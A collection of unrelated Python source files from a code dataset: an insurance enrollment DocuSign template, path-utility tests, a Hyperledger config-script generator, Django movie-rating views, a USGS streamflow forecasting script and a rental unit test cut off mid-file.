+{"seq_id":"65429868","text":"from taa.services.docusign.service import DocuSignServerTemplate, DocuSignRadioTab, DocuSignTextTab\nfrom taa.services.docusign.DocuSign_config import get_template_id\nfrom taa.services.products import ProductService\n\nproduct_service = ProductService()\n\n\nclass GroupCITemplate(DocuSignServerTemplate):\n def __init__(self, recipients, enrollment_data, use_docusign_renderer):\n\n product_type = enrollment_data.get_product_code()\n \n # Use the case situs state to select the form for this product.\n #state = enrollment_data[\"enrollState\"]\n state = enrollment_data.case.situs_state\n \n template_id = get_template_id(product_type, state)\n\n DocuSignServerTemplate.__init__(self, template_id, recipients, use_docusign_renderer)\n\n self.data = enrollment_data\n\n def num_children_on_form(self):\n return 4\n\n def is_child_attachment_form_needed(self):\n return self.data.get_num_covered_children() > self.num_children_on_form()\n\n def get_attachment_children(self):\n return self.data.get_covered_children()[self.num_children_on_form():] if len(self.data.get_covered_children()) > self.num_children_on_form() else []\n\n def should_include_bank_draft(self):\n return self.data.should_include_bank_draft()\n\n def generate_tabs(self, recipient, purpose):\n\n tabs = super(GroupCITemplate, self).generate_tabs(recipient, purpose)\n\n if recipient.is_agent() or self.data.did_finish_signing_in_wizard():\n tabs += self.convert_to_tab_objects(self.make_agent_tabs())\n\n if recipient.is_employee() or self.data.should_use_call_center_workflow():\n tabs += self.convert_to_tab_objects(self.make_employee_tabs())\n\n return tabs\n\n def make_agent_tabs(self):\n agent_radios = []\n \n # identical to whatever EE said\n agent_radios.append(\n {\n 'groupName': 'existingInsAgent',\n 'radios': [\n {\n 'selected': 'True',\n 'value': self.data['existing_insurance']\n }\n ]\n }\n )\n agent_radios.append(\n {\n 'groupName': 'replaceAgent',\n 'radios': [\n {\n 'selected': 'True',\n 'value': self.data['replacing_insurance']\n }\n ]\n }\n )\n\n return {'radioGroupTabs': agent_radios}\n\n def convert_to_tab_objects(self, docusign_tabs):\n \"Takes docusign-formatted tab dicts and converts them to our internal, intermediate representation that our PDF renderer understands.\"\n tabs = []\n\n if 'radioGroupTabs' in docusign_tabs:\n for tab in docusign_tabs['radioGroupTabs']:\n for radio in tab['radios']:\n if radio.get('selected') == \"True\":\n tabs.append(DocuSignRadioTab(group_name=tab['groupName'], value=radio['value'], is_selected=\"True\"))\n\n if 'textTabs' in docusign_tabs:\n for tab in docusign_tabs['textTabs']:\n tabs.append(DocuSignTextTab(name=tab['tabLabel'], value=tab['value']))\n\n return tabs\n\n def make_employee_tabs(self):\n # To get the legacy code below to work, make this a local variable.\n enrollment_data = self.data\n\n idToken = enrollment_data.get_id_token()\n idTokenStr = 'Authentication via Date of Hire: ' + idToken\n\n SOH_RadiosList = []\n SOH_GI_Tabs = []\n\n eeCoverageNullToken = 'NONE'\n if enrollment_data['employee_coverage']:\n if enrollment_data['employee_coverage']['face_value']:\n employeeCoverage = format(\n float(enrollment_data['employee_coverage']['face_value']), ',.0f')\n eePremium = format(float(enrollment_data['employee_coverage']['premium']), ',.2f')\n SOH_RadiosList += generate_SOHRadios(\n 'ee', enrollment_data.get_employee_soh_questions())\n SOH_GI_Tabs += generate_SOH_GI_tabs(\n 'ee', enrollment_data.get_employee_soh_questions())\n else:\n employeeCoverage = eeCoverageNullToken\n eePremium = ' '\n else:\n employeeCoverage = eeCoverageNullToken\n eePremium = ' '\n\n if enrollment_data['spouse_coverage']:\n if enrollment_data['spouse_coverage']['face_value']:\n spouseCoverage = format(\n float(enrollment_data['spouse_coverage']['face_value']), ',.0f')\n spPremium = format(float(enrollment_data['spouse_coverage']['premium']), ',.2f')\n SOH_RadiosList += generate_SOHRadios(\n 'sp', enrollment_data.get_spouse_soh_questions())\n SOH_GI_Tabs += generate_SOH_GI_tabs(\n 'sp', enrollment_data.get_spouse_soh_questions())\n else:\n spouseCoverage = ' '\n spPremium = ' '\n else:\n spouseCoverage = ' '\n spPremium = ' '\n\n childTabsList = []\n childRadiosList = []\n for i, child in enumerate(enrollment_data['children']):\n if (not enrollment_data['children'][i] or\n not enrollment_data['child_coverages'][i]):\n continue\n childTabsList += generate_ChildTabsEntry(i, enrollment_data)\n childRadiosList.append(generate_ChildGenderRadio(i, enrollment_data))\n childRadiosList += generate_SOHRadios('c%s' % (i+1), enrollment_data.get_child_soh_questions(i))\n SOH_GI_Tabs += generate_SOH_GI_tabs('c%s' % (i+1), enrollment_data.get_child_soh_questions(i))\n\n agent_code = enrollment_data.get_agent_code()\n agent_signing_name = enrollment_data.get_agent_signing_name()\n\n eeTabsList = make_applicant_tabs('ee', enrollment_data['employee'])\n\n eeEmail = enrollment_data['employee']['email'] if enrollment_data['employee']['email'] else ''\n\n eeTabsList += [\n make_tab('eeEnrollCityState', u'{}, {}'.format(\n enrollment_data['enrollCity'], enrollment_data['enrollState'])),\n make_tab('identityToken', idTokenStr),\n make_tab('agentCode', agent_code),\n make_tab('agentSignName', agent_signing_name),\n make_tab('eeCoverage', employeeCoverage),\n make_tab('eePremium',\n eePremium if employeeCoverage != eeCoverageNullToken else ''),\n make_tab('Employer', enrollment_data.case.company_name),\n make_tab('eeOtherOwnerName',\n enrollment_data['employee_other_owner_name'] if (\n enrollment_data['employee_owner'] == 'other') else ''),\n make_tab('eeOtherOwnerName2',\n enrollment_data['employee_other_owner_name'] if (\n enrollment_data['employee_owner'] == 'other') else ''),\n make_tab('eeOtherOwnerSSN',\n enrollment_data['employee_other_owner_ssn'] if (\n enrollment_data['employee_owner'] == 'other') else ''),\n make_tab('eeEmail', eeEmail)\n ]\n\n eeTabsList += make_contact_tabs('ee', enrollment_data['employee'])\n\n if enrollment_data['spouse_owner'] == 'other':\n spouseOtherOwnerName = enrollment_data['spouse_other_owner_name']\n spouseOtherOwnerSSN = enrollment_data['spouse_other_owner_ssn']\n elif enrollment_data['spouse_owner'] == 'employee':\n spouseOtherOwnerName = u'{} {}'.format(\n enrollment_data['employee']['first'],\n enrollment_data['employee']['last'])\n spouseOtherOwnerSSN = enrollment_data['employee']['ssn']\n else:\n spouseOtherOwnerName = ''\n spouseOtherOwnerSSN = ''\n\n spouseTabsList = []\n if spouseCoverage != ' ':\n spouseTabsList += make_applicant_tabs('sp', enrollment_data['spouse'])\n spouseTabsList += [\n {\n 'tabLabel': 'spOtherOwnerName',\n 'value': spouseOtherOwnerName\n },\n {\n 'tabLabel': 'spOtherOwnerSSN',\n 'value': spouseOtherOwnerSSN\n },\n {\n 'tabLabel': 'spCoverage',\n 'value': spouseCoverage\n },\n {\n 'tabLabel': 'spPremium',\n 'value': spPremium\n }\n ]\n\n generalRadiosList = []\n generalRadiosList.append(\n {\n 'groupName': 'existingIns',\n 'radios': [\n {\n 'selected': 'True',\n 'value': enrollment_data['existing_insurance']\n }\n ]\n }\n )\n generalRadiosList.append(\n {\n 'groupName': 'replace',\n 'radios': [\n {\n 'selected': 'True',\n 'value': enrollment_data['replacing_insurance']\n }\n ]\n }\n )\n for (prefix_short, prefix_long) in {('ee', 'employee'), ('sp', 'spouse')}:\n if prefix_long == 'employee' or (prefix_long == 'spouse' and spouseCoverage.strip()):\n generalRadiosList.append(\n {\n 'groupName': prefix_short + 'Gender',\n 'radios': [\n {\n 'selected':\n 'True' if (enrollment_data[prefix_long] and\n enrollment_data[prefix_long]['gender'] == 'male') else 'False',\n 'value': 'male'\n },\n {\n 'selected':\n 'True' if (enrollment_data[prefix_long] and\n enrollment_data[prefix_long]['gender'] == 'female') else 'False',\n 'value': 'female'\n }\n ]\n }\n )\n if enrollment_data[prefix_long] and 'is_smoker' in enrollment_data[prefix_long] and enrollment_data[prefix_long]['is_smoker'] != None:\n generalRadiosList.append(\n {\n 'groupName': prefix_short + 'Smoking',\n 'radios': [\n {\n 'selected': 'True' if enrollment_data[prefix_long]['is_smoker'] else 'False',\n 'value': 'smoker'\n },\n {\n 'selected': 'True' if not enrollment_data[prefix_long]['is_smoker'] else 'False',\n 'value': 'nonsmoker'\n }\n ]\n }\n )\n # only include Owner checkbox if coverage was selected\n if ((prefix_short == 'ee' and\n employeeCoverage != eeCoverageNullToken) or\n (prefix_short == 'sp' and spouseCoverage != ' ')):\n generalRadiosList.append(\n {\n 'groupName': prefix_short + 'Owner',\n 'radios': [\n {\n 'selected':\n 'True' if enrollment_data[prefix_long + '_owner'] == 'self' else 'False',\n 'value': 'self'\n },\n {\n 'selected':\n 'True' if ((enrollment_data[prefix_long + '_owner'] == 'other') or\n (enrollment_data[prefix_long + '_owner'] == 'employee')) else 'False',\n 'value': 'other'\n }\n ]\n }\n )\n\n return {\n 'textTabs':\n eeTabsList + spouseTabsList + childTabsList + SOH_GI_Tabs,\n 'radioGroupTabs':\n generalRadiosList + SOH_RadiosList + childRadiosList\n }\n\n\ndef generate_SOHRadios(prefix, soh_questions):\n radioList = []\n for i, soh_question in enumerate(soh_questions):\n if soh_question['answer'] and soh_question['answer'].upper() == 'GI':\n # GI - skip for now\n selected = 'False'\n answer = 'GI'\n else:\n selected = 'True'\n answer = 'no'\n radioList.append({\n 'groupName': prefix + 'SOH' + str(i+1),\n 'radios': [{'selected': selected, 'value': answer}],\n })\n return radioList\n\n\ndef generate_SOH_GI_tabs(prefix, soh_questions):\n tabs = []\n for i, soh_question in enumerate(soh_questions):\n if soh_question['answer'] and soh_question['answer'].upper() == 'GI':\n # GI - skip for now\n answer = 'GI'\n else:\n answer = ''\n tabs.append(make_tab('{prefix}SOH{i}gi'.format(prefix=prefix, i=i+1), answer))\n return tabs\n\n\ndef generate_ChildGenderRadio(child_index, wizard_data):\n return {\n 'groupName': 'child' + str(child_index + 1) + 'Gender',\n 'radios': [\n {\n 'selected': 'True' if wizard_data['children'][child_index]['gender'] == 'male' else 'False',\n 'value': 'male'\n },\n {\n 'selected': 'True' if wizard_data['children'][child_index]['gender'] == 'female' else 'False',\n 'value': 'female'\n }\n ]}\n\n\ndef generate_ChildGenderAbbrevTab(child_index, wizard_data):\n if wizard_data['children'][child_index]['gender'] == 'male':\n genderAbbrev = 'M'\n elif wizard_data['children'][child_index]['gender'] == 'female':\n genderAbbrev = 'F'\n else:\n genderAbbrev = ''\n return {'tabLabel': 'child' + str(child_index + 1) + 'GenderAbbrev',\n 'value': genderAbbrev}\n\n\ndef generate_ChildTabsEntry (child_index, wizard_data):\n childStr = 'child' + str(child_index +1)\n child_coverage = wizard_data['child_coverages'][child_index]\n tabsList = [\n # FullName is only used for child >2, otherwise FName and LName on\n # child <=2 assuming for now the Docusign API will ignore those tabs\n # not used in the template\n {\n 'tabLabel': childStr + 'FullName',\n 'value': u'{} {}'.format(\n wizard_data['children'][child_index]['first'],\n wizard_data['children'][child_index]['last'])\n },\n {\n 'tabLabel': childStr + 'FName',\n 'value': wizard_data['children'][child_index]['first']\n },\n {\n 'tabLabel': childStr + 'LName',\n 'value': wizard_data['children'][child_index]['last']\n },\n {\n 'tabLabel': childStr + 'DOB',\n 'value': wizard_data['children'][child_index]['birthdate']\n },\n {\n 'tabLabel': childStr + 'SSN',\n 'value': wizard_data['children'][child_index]['ssn']\n },\n {\n 'tabLabel': childStr + 'Coverage',\n 'value': format(float(child_coverage['face_value']), ',.0f') if child_coverage else ''\n },\n {\n 'tabLabel': childStr + 'Premium',\n 'value':\n format(float(child_coverage['premium']), ',.2f') if child_coverage else ''\n },\n ]\n return tabsList\n\n\ndef make_tab(name, val):\n return dict(tabLabel=name, value=val)\n\n\ndef make_radio_tab(group_name, selected, val):\n return {\n 'groupName': group_name,\n 'radios': [\n {\n 'selected': 'True' if selected else 'False',\n 'value': val,\n }\n ]\n }\n\n\ndef make_applicant_tabs(prefix, data):\n tabs = [\n make_tab(prefix + 'FName', data['first']),\n make_tab(prefix + 'LName', data['last']),\n make_tab(prefix + 'DOB', data['birthdate']),\n make_tab(prefix + 'SSN', data['ssn']),\n ]\n if data.get('height'):\n height_ft = '%s' % int(float(data['height'])/12.0)\n height_in = '%s' % int(float(data['height'])%12.0)\n tabs += [\n make_tab(prefix + 'HeightFt', height_ft),\n make_tab(prefix + 'HeightIn', height_in),\n ]\n if data.get('weight'):\n tabs += [make_tab(prefix + 'Weight', data['weight'])]\n return tabs\n\n\ndef make_contact_tabs(prefix, data):\n return [\n make_tab(prefix + 'Street1', data['address1']),\n make_tab(prefix + 'Street2',\n data['address2'] if 'address2' in data else ''),\n make_tab(prefix + 'City', data['city']),\n make_tab(prefix + 'State', data['state']),\n make_tab(prefix + 'Zip', data['zip']),\n make_tab(prefix + 'Phone', data['phone']),\n make_tab(prefix + 'Email', data['email']),\n ]","sub_path":"taa/services/docusign/templates/group_ci.py","file_name":"group_ci.py","file_ext":"py","file_size_in_byte":17371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"432047346","text":"import six\n\nfrom flex.serializers.core import ParameterSerializer\nfrom flex.paths import (\n get_path_parameter_values,\n get_parameter_names_from_path,\n path_to_pattern,\n)\nfrom flex.constants import (\n INTEGER,\n STRING,\n PATH,\n)\n\n\nID_IN_PATH = {\n 'name': 'id', 'in': PATH, 'description': 'id', 'type': INTEGER, 'required': True,\n}\nUSERNAME_IN_PATH = {\n 'name': 'username', 'in': PATH, 'description': 'username', 'type': STRING, 'required': True\n}\n\n\n#\n# get_path_parameter_values tests\n#\ndef test_getting_parameter_values_from_path():\n serializer = ParameterSerializer(many=True, data=[\n ID_IN_PATH,\n USERNAME_IN_PATH,\n ])\n assert serializer.is_valid(), serializer.errors\n parameters = serializer.object\n\n values = get_path_parameter_values(\n request_path='/get/fernando/posts/1234/',\n api_path='/get/{username}/posts/{id}/',\n path_parameters=parameters\n )\n assert len(values) == 2\n assert 'username' in values\n assert 'id' in values\n assert isinstance(values['username'], six.string_types)\n assert isinstance(values['id'], int)\n\n\n#\n# get_parameter_names_from_path tests\n#\ndef test_non_parametrized_path_returns_empty():\n path = \"/get/with/no-parameters\"\n names = get_parameter_names_from_path(path)\n assert len(names) == 0\n\n\ndef test_getting_names_from_parametrized_path():\n path = \"/get/{username}/also/{with_underscores}/and/{id}\"\n names = get_parameter_names_from_path(path)\n assert len(names) == 3\n assert (\"username\", \"with_underscores\", \"id\") == names\n\n\n#\n# path_to_pattern tests\n#\ndef test_undeclared_api_path_parameters_are_skipped():\n \"\"\"\n Test that parameters that are declared in the path string but do not appear\n in the parameter definitions are ignored.\n \"\"\"\n path = '/get/{username}/posts/{id}/'\n serializer = ParameterSerializer(many=True, data=[\n ID_IN_PATH,\n ])\n assert serializer.is_valid(), serializer.errors\n parameters = serializer.object\n pattern = path_to_pattern(path, parameters)\n assert pattern == '^/get/\\{username\\}/posts/(?P.+)/$'\n","sub_path":"tests/core/test_path_utils.py","file_name":"test_path_utils.py","file_ext":"py","file_size_in_byte":2118,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"145920837","text":"import string\nfrom sys import argv\n\nscript, arg1 = argv\narg1 = int(arg1)\n\nHOSTS = \"\"\nCONFIGTX = \"\"\nCRYPTOCONFIG = \"\"\nPEERNUMBER = \"\"\nPEERADMINCARD = \"\"\narg1 -= 1\nfor i in range(arg1):\n HOSTS += 'HOST' + str(i+2) + '=10.160.2.' + str(i+6) + '\\n'\n\nfor i in range(arg1):\n CONFIGTX += 'sed -i -e \"s/{IP-HOST-' + str(i+2) + '}/$HOST' + str(i+2) + '/g\" configtx.yaml\\n'\n\nfor i in range(arg1):\n CRYPTOCONFIG += 'sed -i -e \"s/{IP-HOST-' + str(i+2) + '}/$HOST' + str(i+2) + '/g\" crypto-config.yaml\\n'\n\nfor i in range(arg1):\n PEERNUMBER += 'sed -i -e \"s/{IP-HOST-1}/$HOST1/g\" docker-compose-peer' + str(i+2) + '.yml\\n'\n PEERNUMBER += 'sed -i -e \"s/{IP-HOST-' + str(i+2) + '}/$HOST' + str(i+2) + '/g\" docker-compose-peer' + str(i+2) + '.yml\\n'\n\nfor i in range(arg1):\n PEERADMINCARD += 'sed -i -e \"s/{IP-HOST-' + str(i+2) + '}/$HOST' + str(i+2) + '/g\" ../createPeerAdminCard.sh\\n'\n\nfile = \"\"\"#!/bin/bash\ncd \"$(dirname \"$0\")\"\nHOST1=10.160.2.5\n\"\"\" + HOSTS + \"\"\"\nsed -i -e \"s/{IP-HOST-1}/$HOST1/g\" configtx.yaml\n\"\"\" + CONFIGTX + \"\"\"\nsed -i -e \"s/{IP-HOST-1}/$HOST1/g\" crypto-config.yaml\n\"\"\" + CRYPTOCONFIG + \"\"\"\nsed -i -e \"s/{IP-HOST-1}/$HOST1/g\" docker-compose.yml\n\"\"\" + PEERNUMBER + \"\"\"\nsed -i -e \"s/{IP-HOST-1}/$HOST1/g\" ../createPeerAdminCard.sh\n\"\"\" + PEERADMINCARD + \"\"\"\n\ncryptogen generate --config=./crypto-config.yaml\nexport FABRIC_CFG_PATH=$PWD\nconfigtxgen -profile ComposerOrdererGenesis -outputBlock ./composer-genesis.block\nconfigtxgen -profile ComposerChannel -outputCreateChannelTx ./composer-channel.tx -channelID composerchannel\n\nORG1KEY=\"$(ls crypto-config/peerOrganizations/org1.example.com/ca/ | grep 'sk$')\"\n\nsed -i -e \"s/{ORG1-CA-KEY}/$ORG1KEY/g\" docker-compose.yml\n\"\"\"\n\ntext_file = open(\"composer/howtobuild.sh\", \"w\")\ntext_file.write(file)\ntext_file.close()","sub_path":"config-all/howtobuildterraform.py","file_name":"howtobuildterraform.py","file_ext":"py","file_size_in_byte":1783,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"87888670","text":"from datetime import datetime\nfrom statistics import mean\nfrom django.shortcuts import render_to_response\nfrom django.template import RequestContext\nfrom ratings.forms import RatingForm\nfrom ratings.models import Link, Movie, Rating, Movie_Genre, Tag, Rater\n\n\n# Create your views here.\ndef movie_view(request, movie_id):\n movie = Movie.objects.get(id=movie_id)\n genres = Movie_Genre.objects.filter(movie=movie)\n tags = Tag.objects.filter(id=movie_id)\n link = Link.objects.get(movie=movie)\n if request.POST:\n if \"delete\" in request.POST:\n Rating.objects.get(movie=movie, rater=request.user.rater).delete()\n else:\n Rating.objects.get_or_create(movie=movie, rater=request.user.rater,\n defaults={\"rating\": request.POST[\"rating\"],\n \"timestamp\": int(datetime.now().timestamp())})\n movie.calculate_average_rating()\n avg_rating = round(movie.average_rating, 1)\n context = {\"movie\": movie, \"tags\": tags, \"genres\": genres, \"link\": link, \"avg_rating\": avg_rating}\n if request.user:\n rating = Rating.objects.filter(movie=movie, rater=request.user.rater)\n context[\"form\"] = RatingForm()\n if rating:\n context[\"rating\"] = rating[0]\n context[\"form\"].rating = rating[0]\n return render_to_response(\"movies.html\", context, context_instance=RequestContext(request))\n\n\ndef rater_view(request, rater_id):\n rater = Rater.objects.get(id=rater_id)\n ratings = Rating.objects.filter(rater=rater)\n avg_rating = str(mean([rating.rating for rating in ratings]))[:3]\n tags = Tag.objects.filter(rater=rater)\n context = {\"rater\": rater, \"ratings\": ratings, \"avg_rating\": avg_rating, \"tags\": tags}\n return render_to_response(\"raters.html\", context, context_instance=RequestContext(request))\n\n\ndef top_movie_view(request):\n top_movies = Movie.objects.all().order_by(\"-average_rating\")[:20]\n context = {\"top_movies\": top_movies}\n return render_to_response(\"top_movies.html\", context, context_instance=RequestContext(request))\n\n","sub_path":"movieratings/ratings/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2121,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"407750510","text":"def binaryNumber(number):\n result=0\n lenght=len(number)\n for i in range(lenght):\n result+=int(number[i])*(2**(lenght-i-1))\n return result\n\ndef searchForDegree(number,numberInPower):\n for i in range(int(numberInPower)):\n power=number**i\n if power >= numberInPower:\n return i\n\ndef numberBinary(x):\n n = \"\"\n while x > 0:\n y = str(x % 2)\n n = y + n\n x = int(x / 2)\n return n\n\nimport itertools\nbinaryTape=\"\"\ncombinationsOptions=[]\npossibleNumbers=[]\n\nfor line in open(\"Text\"):\n values= line.split(\",\")\nbinary=values[0]\nvalue=int(values[1][0:])\n\nfor i in range(searchForDegree(value,binaryNumber(binary))+1):\n n=numberBinary(value**i)\n possibleNumbers.append(int(n))\n\nfor p in itertools.product(possibleNumbers, repeat=3):\n binaryTape=str(p[0])+str(p[1])+str(p[2])\n if binaryTape == binary :\n combinationsOptions.append(p)\n a=\"\"\n\nprint(possibleNumbers)\nprint(binary,value)\nprint(combinationsOptions)\n\n","sub_path":"algorithmLab5/fantz.py","file_name":"fantz.py","file_ext":"py","file_size_in_byte":997,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"265601220","text":"# Adam Stratman\n# 10/31/20\n\n\n# %%\n# Import the modules we will use\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport datetime\nimport os\nimport json\nimport urllib.request as req\nimport urllib\nfrom sklearn.linear_model import LinearRegression\n\n# Note you may need to do pip install for sklearn\n\n\n# %%\n# Building a function for flow prediction outside of the AR model\ndef real_prediction(indexnumber, last_week_flow, last2_week_flow=None):\n ''''\n This function is prepping the linear regression model to be\n multiplied by a correction factor to bring it down to a more\n reasonable value for the forecast of week 1 and week 2.\n '''\n if indexnumber == 0 and last2_week_flow is None:\n rp = (model.intercept_ + model.coef_[indexnumber] * last_week_flow)\n if indexnumber == 1:\n rp = (model2.intercept_ + model2.coef_[0] * last_week_flow +\n model2.coef_[indexnumber] * last2_week_flow)\n if indexnumber != 0 and indexnumber != 1:\n print('The index number =', indexnumber, 'is not valid. Enter 0 or 1.')\n return rp\n\n\n# %%\n# ** MODIFY **\n# 1) the location of the data --- this time on the internet\n# 2) You need to know how its formatted.\n\nurl = \"https://waterdata.usgs.gov/nwis/dv?cb_00060=on&format=rdb&site_no=09506000&referred_module=sw&period=&begin_date=1989-01-01&end_date=2020-10-19\"\n\n# Now we can read it with read_table command the same as we did before\n# Note this only works if you select the tab separated data --- try it with table and you will see it doesn't\ndata2 = pd.read_table(url, skiprows=30, names=['agency_cd', 'site_no',\n 'datetime', 'flow', 'code'],\n parse_dates=['datetime'], index_col='datetime')\n\n#separating url onto multiple lines\nurl = \"https://waterdata.usgs.gov/nwis/dv?cb_00060=on&format=rdb&site_no=09506000\" \\\n \"&referred_module=sw&period=&begin_date=1989-01-01&end_date=2020-10-19\"\n\n#Replace parts of my url with variables\nsite = '09506000'\nstart = '1989-01-01'\nend = '2020-10-31'\nurl = \"https://waterdata.usgs.gov/nwis/dv?cb_00060=on&format=rdb&site_no=\" + site + \\\n \"&referred_module=sw&period=&begin_date=\" + start + \"&end_date=\" + end\ndata2 = pd.read_table(url, skiprows=30, names=['agency_cd', 'site_no',\n 'datetime', 'flow', 'code'],\n parse_dates=['datetime'], index_col='datetime')\n\n\n# %%\n# Read the data into a pandas dataframe\ndata = pd.read_table(url, sep='\\t', skiprows=30,\n names=['agency_cd', 'site_no', 'datetime', 'flow',\n 'code'],\n parse_dates=['datetime'])\n# Expand the dates to year month day\ndata['year'] = pd.DatetimeIndex(data['datetime']).year\ndata['month'] = pd.DatetimeIndex(data['datetime']).month\ndata['day'] = pd.DatetimeIndex(data['datetime']).dayofweek\ndata['dayofweek'] = pd.DatetimeIndex(data['datetime']).dayofweek\n\n# %%\n# Aggregate flow values to weekly\nflow_weekly = data.resample(\"W\", on='datetime').mean()\n# %%\n# Setting up the arrays for my model I will use\n# This is an autoregressive model that uses two time lags\nflow_weekly['flow_tm1'] = flow_weekly['flow'].shift(1)\nflow_weekly['flow_tm2'] = flow_weekly['flow'].shift(2)\n\n# %%\n# Variables that change weekly\nlast_week_flow = 80.157\nlast2_week_flow = 73.657\n# %%\n# Here I'm grabbing weeks from 1996-2000 as training dates\n# For the test it runs from 2000 to most current time in data\n\n# LC - You could think about having these date ranges be variable you\n# define at the top\ntrain = flow_weekly[370:600][['flow', 'flow_tm1', 'flow_tm2']]\ntest = flow_weekly[600:][['flow', 'flow_tm1', 'flow_tm2']]\n\n\n# %%\n# Making a linear regression with Sklearn\nmodel = LinearRegression()\nx = train['flow_tm1'].values.reshape(-1, 1)\ny = train['flow'].values\nmodel.fit(x, y)\n# Look at the results including r_squared value, intercept, slope\n# r^2 values\nr_sq = model.score(x, y)\nprint('coefficient of determination:', np.round(r_sq, 2))\nprint('intercept:', np.round(model.intercept_, 2))\nprint('slope:', np.round(model.coef_, 2))\n\n\n# %%\n# Looking at one week time lag to make prediciton\n# Looking at prediction based on previous week\nprediction = model.intercept_ + model.coef_ * last_week_flow\nprint(\"prediciton based on previous week=\", prediction)\n\n\n# %%\n# Adding another week to the model (week1, week 2 time lag)\n# Using two time lags in the linear regression\nmodel2 = LinearRegression()\nx2 = train[['flow_tm1', 'flow_tm2']]\nmodel2.fit(x2, y)\nr_sq = model2.score(x2, y)\nprint('coefficient of determination:', np.round(r_sq, 2))\nprint('intercept:', np.round(model2.intercept_, 2))\nprint('slope:', np.round(model2.coef_, 2))\n# %%\n# Using two weeks prior to make prediciton 9/27-10/3\nprediction2 = model2.intercept_ + model2.coef_[0] * last_week_flow\n+ model2.coef_[1] * last2_week_flow\nprint(\"prediciton based on previous 2 weeks=\", prediction2)\n\n\n# %%\n# Making my predictions outside of the AR model\n# This utilizes a correction factor calculated by looking at the AR model value\n# And comparing it to previous weeks observed flow\n\nmy_prediction_1 = real_prediction(0, last_week_flow, None)*0.80\nmy_prediction_2 = real_prediction(1, last_week_flow, last2_week_flow)*.84\nprint(\"week 1 prediction outside AR=\", my_prediction_1.round(1))\nprint(\"week 2 prediction outside AR=\", my_prediction_2.round(1))\n\n\n# %%\n# The four numbers show my AR model and my corrected forecast values\n# For week 1 and week 2 predicitons\nprint(\"AR prediciton based on previous 1 week=\", prediction.round(1))\nprint(\"AR prediciton based on previous 2 weeks=\", prediction2.round(1))\nprint(\"This is my week 1 prediction outside the AR model=\",\n my_prediction_1.round(1))\nprint(\"This is my week 2 prediciton outside the AR model=\",\n my_prediction_2.round(1))\n\n\n\n# %%\n# Redefining the data to be able to look at datetime\n# Data easily and pull out times I want\ndata2 = data.copy()\ndata2['datetime'] = pd.to_datetime(data2['datetime'])\ndata2 = data2.set_index('datetime')\n\n\n# %%\n# Making a new data set to look at weekly minimum flows for 16 week forecast\ndata_w = data2.resample(\"w\").min()\n\n\n# %%\n# Pulling out weekly data I will use for the 16 week forecast\ndata_w.loc[\"2019-8-15\":\"2019-12-15\"]\n\n# %%\n# Here I have put the weekly data from the previous cell into an array\n# I then averaged the current and proceeding week\nweekly_2019_mins = np.array([48.1, 29.6, 35.7, 59, 48.6, 51.2, 60.9, 72.7,\n 80.7, 73.9, 81.2, 97.1, 124, 130, 147, 180, 445])\n\nforecast_16_week = ((weekly_2019_mins +\n np.roll(weekly_2019_mins, 1))/2.0)[1::1]\nprint(\"These will serve as my 16 week forecast values\", forecast_16_week)\n\n\n# %%\n","sub_path":"assignment_11-Group_Project/Stratman_week10.py","file_name":"Stratman_week10.py","file_ext":"py","file_size_in_byte":6742,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"477384432","text":"import unittest\r\n\r\nfrom Customer import Customer\r\nfrom Rental import Rental\r\nfrom Movie import Movie\r\n\r\nREGULAR = 0\r\nCHILDRENS = 2\r\nNEW_RELEASE = 1\r\n\r\nclass TestCustomer(unittest.TestCase):\r\n \r\n pedro = Customer(\"Петр\")\r\n \r\n robocop = Movie(\"Робокоп\", price_code=REGULAR)\r\n one_day_rent = Rental(robocop, days_rented=1)\r\n great_then_two_days_rent = Rental(robocop, days_rented=3)\r\n\r\n batman = Movie(\"Бэтмен против Супермена\", price_code=NEW_RELEASE)\r\n one_day_new_rel_rent = Rental(batman, days_rented=1)\r\n greater_then_one_day_new_release_rent = Rental(batman, days_rented=2)\r\n\r\n kinglion = Movie(\"Король Лев\", price_code=CHILDRENS)\r\n one_day_child_rent = Rental(kinglion, days_rented=1)\r\n greater_then_three_days_child_rent = Rental(kinglion, days_rented=4)\r\n\r\n def setUp(self):\r\n self.pedro.rentals = []\r\n\r\n def test_one_day_one_regular(self):\r\n self.pedro.add_rental(self.one_day_rent)\r\n statement = self.statement(\r\n movie=self.one_day_rent.get_movie(), \r\n this_amount = 2, \r\n total_amount = 2, \r\n frequent_renter_points = 1)\r\n self.assertEqual(statement, self.pedro.statement())\r\n\r\n def test_great_then_two_days_regular(self):\r\n self.pedro.add_rental(self.great_then_two_days_rent)\r\n statement = self.statement(\r\n movie=self.great_then_two_days_rent.get_movie(), \r\n this_amount = 3.5, \r\n total_amount = 3.5, \r\n frequent_renter_points = 1)\r\n self.assertEqual(statement, self.pedro.statement())\r\n\r\n def test_one_day_new_release(self):\r\n self.pedro.add_rental(self.one_day_new_rel_rent)\r\n statement = self.statement(\r\n movie=self.one_day_new_rel_rent.get_movie(), \r\n this_amount = 3, \r\n total_amount = 3, \r\n frequent_renter_points = 1)\r\n self.assertEqual(statement, self.pedro.statement())\r\n\r\n def test_greater_then_one_day_new_release(self):\r\n self.pedro.add_rental(self.greater_then_one_day_new_release_rent)\r\n statement = self.statement(\r\n movie=self.greater_then_one_day_new_release_rent.get_movie(), \r\n this_amount = 6, \r\n total_amount = 6, \r\n frequent_renter_points = 2)\r\n self.assertEqual(statement, self.pedro.statement())\r\n\r\n def test_one_day_child_rent(self):\r\n self.pedro.add_rental(self.one_day_child_rent)\r\n statement = self.statement(\r\n movie=self.one_day_child_rent.get_movie(), \r\n this_amount = 1.5, \r\n total_amount = 1.5, \r\n frequent_renter_points = 1)\r\n self.assertEqual(statement, self.pedro.statement()) \r\n\r\n def test_greater_then_three_days_child_rent(self):\r\n self.pedro.add_rental(self.greater_then_three_days_child_rent)\r\n statement = self.statement(\r\n movie=self.greater_then_three_days_child_rent.get_movie(), \r\n this_amount = 